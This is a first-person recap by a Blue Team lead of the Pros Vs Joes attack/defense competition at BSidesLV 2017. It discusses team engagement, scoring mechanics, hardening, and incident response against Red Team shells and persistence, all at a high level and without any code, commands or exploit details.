Leading a Blue Team at Pros Vs Joes, BSidesLV 2017

Pros Vs Joes at BSidesLV 2017 was an incredible year in terms of game progression and development. The game ran smoother this time than ever before, not only that but the teams were more effective and ultimately I think everyone had a pretty good time. The game has been transforming dramatically over time, it's now on the 3rd iteration of scorebot, and we've seen some massive changes to the rules and strategy of the game. The new economy aspect was one of my favorite parts; Dichotomy's Marketplace lets you spend points to get small effects in the game, which gives one the potential for a strategic advantage in various ways. We used this to reset our services at key times, taking a small hit but ultimately securing second place for us in the scoring. In the following post I'm going to highlight some of my pain points, successes, and overall thoughts in leading a Blue Team at PvJ this year.

This was my first time leading a Blue Team at Pros Versus Joes, from start to finish. Our team, SOC Team 6, did absolutely amazing (despite missing 3 players) and we ended up taking second place after playing a very strong game. We really earned second place this year, with David's team securing first again, and I personally feel very good about our game play as it was seemingly night and day from last year. I think all team leads struggled with levels of engagement this year, in fact Caz wrote up an excellent piece covering this, which I hope he publishes. Early engagement is important to assess players skill levels so they can be appropriately placed with mentors and to balance out the subteams. I ended up spending most of my time playing a resources game, making sure we had the appropriate people working on the right tasks. Further, our pain points in dealing with Grey Team as a Blue Team this year seem to have been greatly reduced through balancing the game's scoring (last year these interactions drove us into the negatives and dramatically changed the game). There were still some hardware constraints this year, like when we would peg 100% CPU utilization on the firewall, which caused us to drop packets and fail service checks. All teams were also still limited by the VPN, meaning at times I had 1-2 players sitting on the bench waiting for a VPN connection. Despite these small hickups, the environment seemingly gets more stable each year. Further, The Red Teams had advanced access this year, meaning the environment was more wrought with traps than ever, despite mostly being the same configuration of machines and services.

The Red Team got advanced access this year, allowing them to exploit and plant post exploitation measures equally across the environment. I really liked this aspect of the game as it trends the game more towards incident response and less around initial hardening scripts. Further, the Red Team shared their slides which was an amazing tell all of the exploits they used and pre-planted persistence they would leverage on day one. Not only were these slides whipped up in only a few minutes, but the PvJ Red Team also applies pressure in an expert fashion throughout the game, targeting the teams doing the best the hardest. Day two also introduces Scorched Earth, where we got hit with the same old DNS DoS attack from previous years, but we were able to bounce back quick from that outage when we knew exactly what it was.

Our success as a Blue Team was both in hardening and incident response. We prepared some nice hardening GPOs and scripts before which allowed us to lock down our Windows domain and Linux servers early. We were also effective in finding and eliminating shells and persistence mechanisms through a series of IR scripts we had prepared. Our host based egress filtering was extremely effective, however Dichotomy reminded us early this was against the rules, and when we disabled this local firewall rules on all machines we quickly saw many shells escape the network. Again, we used Snort on the PFSense firewall to play a locked down network game, and also used this network telemetry to hunt infections on the various hosts. Once we identified the hosts it was usually pretty simple to kill the shells, find persistence mechanisms, and examine the logs to understand how it was compromised. Unfortunately, we didn't get to centralized host management or a centralized place for log analysis despite this being in the planning. We also used other hacky tricks, such as scripting the restarting of a service or disabling shells on boxes. On of my favorite new aspects of the game, Dichotomy's Marketplace, offers teams a way to change the strategy and effect the scoring of the game at an upfront cost to their score. We would use to revert services and machines in our strategy, but in retrospect I wish we had actually purchased more services to catch the leading team. Further, the ability to outsource Grey Team tickets was powerful when some of the things they asked for could be devastating if compromised (such as Domain Admin access). I also really enjoyed the Party Mode at the end of the game, this wacky feature on top of the Scorched Earth phase made the end of the game particularly exciting.

All of that said, this game is an absolutely amazing learning opportunity. Rarely does one get the opportunity to simulate a breach or IR scenario so realistically, like CCDC. I really encourage people to try this game, either if your Blue Team or Red Team, if you've been in a live breach scenario before or not, this is an invaluable experience. This game is also great for those who coach or help with CCDC or other Attack/Defense competitions and want an opportunity to experience the game in a more hands on way. Return players should consider signing up as a Pro, either Blue or Red, as we always need and welcome more returning people in our PvJ community!